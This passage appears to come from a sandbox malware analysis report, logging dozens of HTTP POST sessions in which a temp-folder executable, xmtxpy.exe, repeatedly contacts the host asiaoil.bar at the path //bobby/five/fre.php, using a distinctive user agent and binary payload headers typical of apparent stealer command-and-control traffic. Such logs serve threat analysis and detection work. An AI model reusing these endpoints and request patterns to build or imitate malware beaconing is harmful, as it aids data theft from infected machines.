                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:23:01.731878996 CET | 409 | IN | HTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:23:01 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=jtSZVRNhVan7fQu%2B%2BS3YF0dvuQRKfPnhQmljq7WJs%2Fj8JMEfpH8AMemLWNbqYw4tgA6v4NG3xTvYc3Z5%2FpGQb5ljWthkbv4uo%2FhbZQYC96NTyl%2B9dg2FM9CZdOcU%2Bw%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db446bf3ee59235-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    56 | 192.168.2.22 | 49221 | 172.67.197.66 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Feb 10, 2022 10:23:02.628099918 CET | 410 | OUT | POST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:23:02.733601093 CET | 411 | IN | HTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:23:02 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Lp2m%2FnL%2FD9YbbOQL75qiqY1QRie4l95Zh1%2F9JFc7ntQcAGF4IIGoKgD%2F4oPRxszoZK9oVvGOpnhqWzAxSgnH3OqLPGrbcPmuYuhePgMIcrCkD3ZE2%2Bku1MZOs6ktMA%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db446c57aff90af-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    57 | 192.168.2.22 | 49222 | 104.21.49.244 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Feb 10, 2022 10:23:03.670597076 CET | 412 | OUT | POST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:23:03.758486986 CET | 413 | IN | HTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:23:03 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=VTMZeN6TFXbag2y1OBliS7F8Ve1jWw99EUBWoXAAGITxys1b9P94l43Uq0a%2B%2Fvyd8PfkcQkVRk9vtaYxi3J9PRjAhKWq89oNOgEI8T7X4pa5jNQ6EzOTmt9dPn8AJw%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db446cbfd179273-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    58 | 192.168.2.22 | 49223 | 104.21.49.244 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Feb 10, 2022 10:23:04.661405087 CET | 414 | OUT | POST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:23:04.741179943 CET | 415 | IN | HTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:23:04 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=3ixohb6DjBvyEHcF0bBjTjwa28InQY%2BYLPlgexuM%2B84%2F6oOs4V7fazNyzJ4xoT6rgqB9hhVA18VkbtDdbf8imwrd%2Bcpfb9TH%2BBpi1dLQ9%2FLh%2BYjGvjuxWzsCeqqBpA%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db446d23961910a-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    59 | 192.168.2.22 | 49224 | 172.67.197.66 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Feb 10, 2022 10:23:05.954619884 CET | 416 | OUT | POST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:23:06.040098906 CET | 416 | IN | HTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:23:06 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=EE%2FH1l4X4mMaNy6pFboc6LUO8GAlkZzav%2FOZJIxi5sLykIm1li2uICH5vhNS6WFsxhSSyzMACuulnYIlnwvZpCsgsM7VNvUGg6SyBgvKaTyfwg7BclNEWkPSWBEWjg%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db446da4ba95c32-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    6 | 192.168.2.22 | 49171 | 172.67.197.66 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Feb 10, 2022 10:22:07.006112099 CET | 321 | OUT | POST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:22:07.110586882 CET | 322 | IN | HTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:22:07 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=mWD8oFcQTyd%2FKCuxdF4a9PY1C39C0%2FGNEfnX%2F9EktX8IXwXAk4CddsJG8chvleqV6%2Bl4Pe9X7pM9zS7OCYa1Qb%2B3%2FB%2BhM5NKwwPD%2BX%2FUskzFky%2FFOD%2Fvt045vN%2BQZQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db44569da6591e1-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    60 | 192.168.2.22 | 49225 | 172.67.197.66 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Feb 10, 2022 10:23:08.596977949 CET | 417 | OUT | POST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:23:08.680362940 CET | 418 | IN | HTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:23:08 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=glNfx46H3%2BbVLTKDrhap51MhlIRkcModymLBNBd7dZ%2Bl67BTPpZNpBIlfD8OgL00wxL3CdtX6qUD2pekmgxeoZGkVArQG2lmbN%2B57FmuOEvY0CiRqZc24nnj2bPcgA%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db446eac805911f-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    61 | 192.168.2.22 | 49226 | 172.67.197.66 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Feb 10, 2022 10:23:09.667687893 CET | 419 | OUT | POST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:23:09.773921967 CET | 420 | IN | HTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:23:09 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=YpuHPmOjZQu3BJ71RrU5rE6ZD4gK%2FiddjmVX1894nkleKqaO0ZuA%2FZ4t0Hhr%2FEBANQiy%2F1dOteI5pqxTSy6LKaSwgoWmbo0Tuise9gruTiTrmWfL3ef0CFnSmrOP6A%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db446f1795e8fd4-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    62 | 192.168.2.22 | 49227 | 172.67.197.66 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Feb 10, 2022 10:23:10.711121082 CET | 421 | OUT | POST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:23:10.805613041 CET | 422 | IN | HTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:23:10 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=263d7oWUNYmuRg8qalPaQG1rkbIXer23yE4CCwJl%2BycPuClpFI6FPf1gIeOZyF3Nt4DWuR0XxZA%2FK2Gwfg9%2FRUCXAmdrBxYU%2F%2FgwYdWQXfhfADT4oSnWfcr7aGjXFA%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db446f7fa7290a3-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    63 | 192.168.2.22 | 49228 | 172.67.197.66 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Feb 10, 2022 10:23:11.750458956 CET | 423 | OUT | POST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:23:11.894766092 CET | 424 | IN | HTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:23:11 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=rZcJVrDpVn0Jvm1Vx3izcMxx2xxi%2BRY0gOKUM%2BjgWD%2BYJ2bGoZJPCLIhbsX3VLB%2FEbDTmlKbO8MOV5p8OY13hTQVrNs14q81gtqG%2BYeK%2B7ujkKePtZGTix4rgIZT4w%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db446fe7f4690fe-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    64 | 192.168.2.22 | 49229 | 172.67.197.66 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Feb 10, 2022 10:23:12.826739073 CET | 424 | OUT | POST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:23:12.954328060 CET | 425 | IN | HTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:23:12 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=hiz8VTs2nqW2CMp0oz2HdrtKIKW9o%2B7ImEcKl2VS1ifwy0ulNriRcW%2FuIGG1IoL3PiyPTyaWq%2BPUB82nqy1x%2F7uZPeiH7cbbBHoH7NU9xoGBLymRw5hquZwyAOhtcQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db44705396d911e-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    65 | 192.168.2.22 | 49230 | 172.67.197.66 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Feb 10, 2022 10:23:13.916424990 CET | 426 | OUT | POST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:23:14.009248972 CET | 427 | IN | HTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:23:13 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=meN57bW15OrovAiOaftPdPV%2BVu9aNc%2FmGkhf3DxgM8J7CqQPL97QEdbuifiRTAjK93npEn2xIesb%2FN5MC7%2B7xpKWknwpItKd6NXh4KBXOeDXxIfIsEdpLWRlGlrQsw%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db4470c0b639142-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    66 | 192.168.2.22 | 49231 | 104.21.49.244 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Feb 10, 2022 10:23:14.928308964 CET | 428 | OUT | POST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:23:15.005187035 CET | 429 | IN | HTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:23:14 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=MLXoax8jkqv8eBPwf%2B%2FHkLStnp33pID1OGlxzxpw8mT%2BDJtVm%2Fko7dCOHPmAgnMB01wvsNPWgM%2BACIJ3McTTt4l4slPJE0ia9l6oA1b3jZBpZmUytzUvT6%2BsM8O8%2Bw%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db447125bf8911f-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    67 | 192.168.2.22 | 49232 | 172.67.197.66 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Feb 10, 2022 10:23:16.169338942 CET | 430 | OUT | POST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:23:16.265043974 CET | 431 | IN | HTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:23:16 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=3gZJQzAkWL%2Fu0oyFSXQkAE19rOUvT86ounx%2F2nUfTZE5zhEaRM6VwUQCQNWwfitnmL12%2B1q8KR5pPRKomKLsKvLs0yZmFdrB49ckYXWQAh8%2FP4%2FjzcT6%2BgWMfOI%2Bcg%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db4471a19969048-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    68 | 192.168.2.22 | 49234 | 104.21.49.244 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Feb 10, 2022 10:23:17.425743103 CET | 432 | OUT | POST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:23:17.529016018 CET | 433 | IN | HTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:23:17 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=CVWgNT%2F3L1%2BppaTVgVDCxoKwuyVyVDAH6zVKoRJylnyRNyfDC2xX0Vm24lOeOSechfzcA1vgmVZNQs67XBF8JYV4Q8GGFRHDfBe2OCBaYxj7dDGPN3FxV3Y9%2Fs9AEg%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db44721ffb76983-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    69 | 192.168.2.22 | 49235 | 104.21.49.244 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Feb 10, 2022 10:23:18.783854008 CET | 433 | OUT | POST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:23:18.911052942 CET | 434 | IN | HTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:23:18 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=JkW3Yfq8929bkmz%2BZxma5WCDFCwlkkeMrZVjES5%2BGp19oTJDA%2FvVeGYB6q0J4yXwf6O8Ujd%2Bm4xURLIdmdWv80xluGmLKk%2BK5CnuxjOzH0TaS2jR2NsT%2BwpcvVu%2BPQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db4472a7d7c9193-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    7 | 192.168.2.22 | 49172 | 104.21.49.244 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Feb 10, 2022 10:22:08.131839037 CET | 323 | OUT | POST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:22:08.291701078 CET | 324 | IN | HTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:22:08 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=GAzVwCo6pQjEmafddnL4QX9z1sDFHB2J%2FYbOLf50is46eNnXoOwYOokrFvyBn6ciX3XJ3aLhnc3SW1RSny%2BWp7rsb%2FchkjZeaoltFUzmAOwl3IbNQWt4WAouWFDm8Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db44570da0591ea-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    70 | 192.168.2.22 | 49236 | 172.67.197.66 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Feb 10, 2022 10:23:19.840840101 CET | 435 | OUT | POST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:23:19.945090055 CET | 436 | IN | HTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:23:19 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=jX4p5OL3M4bhKeaGYr6eMZP4ecEb%2BRQKJFJMvHycGUM%2BR1sW8i66slzCERtcv76o3GVZu2AT%2BBb9%2BnWVHSGrEHQ65OlnuuLV3NX69%2BnX0CllH9Ufi1dPL3kXbE9UsQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db447310d2a918f-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    71 | 192.168.2.22 | 49237 | 172.67.197.66 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Feb 10, 2022 10:23:20.970686913 CET | 437 | OUT | POST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:23:21.069719076 CET | 438 | IN | HTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:23:21 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=wCsqQDtUNyAdb8N7QE5gpRV6yQp9OM5kLzcDr7AlwMrEbZXvVwvalAee7gk3yYD6lCHsuYIHi9jPPTnfADT3Vv66t86Ej5Rk3p%2BU8OrA6dwgCuh8u7DexDMJSkMrXQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db447381a755be1-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    72 | 192.168.2.22 | 49238 | 172.67.197.66 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    Timestamp | kBytes transferred | Direction | Data


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    73 | 192.168.2.22 | 49239 | 172.67.197.66 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    Timestamp | kBytes transferred | Direction | Data


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    74 | 192.168.2.22 | 49240 | 172.67.197.66 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    Timestamp | kBytes transferred | Direction | Data


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
